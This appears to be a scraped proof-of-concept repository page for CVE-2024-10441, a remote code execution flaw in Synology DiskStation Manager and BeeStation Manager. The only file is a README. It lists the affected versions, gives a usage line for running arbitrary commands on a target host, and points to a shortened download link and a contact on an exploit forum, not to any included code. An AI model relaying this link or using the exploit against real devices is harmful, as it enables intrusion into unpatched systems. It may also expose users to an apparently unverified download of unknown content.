CVE-2024-10441 PoC — Synology DiskStation Manager（DSM）和Synology BeeStation Manager 安全漏洞

Source

Associated Vulnerability

Readme

# Improper Encoding or Escaping of Output (CVE-2024-10441)

## Overview

An improper encoding or escaping of output vulnerability exists in the system plugin daemon of Synology products, specifically affecting BeeStation Manager (BSM), DiskStation Manager (DSM), and Unified Controller (DSMUC). The vulnerability allows remote attackers to execute arbitrary code through unspecified attack vectors.



## Details

- **CVE ID**: [CVE-2024-10441](https://nvd.nist.gov/vuln/detail/CVE-2024-10441)  
- **Discovered**: 2025-03-17
- **Published**: 2025-03-18
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.

## Vulnerability Description

Improper encoding or escaping of output vulnerability in the system plugin daemon in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allows remote attackers to execute arbitrary code via unspecified vectors.

## Affected Versions

Synology BeeStation OS (BSM) before 1.1-65374

Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1


## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```

## Contact

For inquiries, please contact **cybersecuritist@exploit.in**

## Exploit:
### [Download here](https://bit.ly/43ApbAH)

File Snapshot

 [4.0K]  /data/pocs/38560803a0397b9ff4ae867b7ed745ccaf7cba00
└── [1.3K]  README.md

0 directories, 1 file

Remarks